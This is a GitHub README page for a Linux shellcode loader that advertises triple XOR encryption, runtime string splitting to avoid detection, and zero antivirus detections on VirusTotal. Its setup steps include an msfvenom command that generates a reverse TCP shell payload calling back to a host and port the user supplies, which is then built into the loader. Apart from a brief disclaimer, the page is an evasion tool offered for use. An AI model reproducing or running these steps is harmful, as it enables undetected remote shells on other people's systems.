Skip to content

A lightweight, modular shellcode loader for Linux with triple XOR encryption and modern evasion techniques.

Notifications You must be signed in to change notification settings

Pwn3rx0/linux-loader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Modular Shellcode Loader for Linux

A lightweight, modular shellcode loader for Linux with triple XOR encryption and modern evasion techniques.

VirusTotal Results

Screenshot from 2026-01-30 20-02-06

0/70 detections - Fully undetected by all major AV engines

1. Clone & compile

git clone https://github.com/Pwn3rx0/linux-loader.git
cd linux-loader
# replace shellcode.bin with your own
msfvenom -p linux/x64/shell_reverse_tcp lhost=<ur-ip> lport=<ur-port> -f raw -o shellcode.bin
make all
./dist/shellcode_loader

🛡️ Features

  • Triple XOR Encryption - Each byte encrypted with 3 unique keys
  • String Splitting - Strings assembled at runtime to evade detection
  • Binary Hardening - Full PIE, RELRO, stripped symbols, no execstack
  • Modular Design - Clean separation of decryption, execution, and utilities
  • No Anti-VM/Debug - Focused on core functionality without anti-analysis

Caution

This tool is designed for EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY. I AM NOT RESPONSIBLE FOR YOUR ACTIONS. DON'T DO BAD STUFF.

About

A lightweight, modular shellcode loader for Linux with triple XOR encryption and modern evasion techniques.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published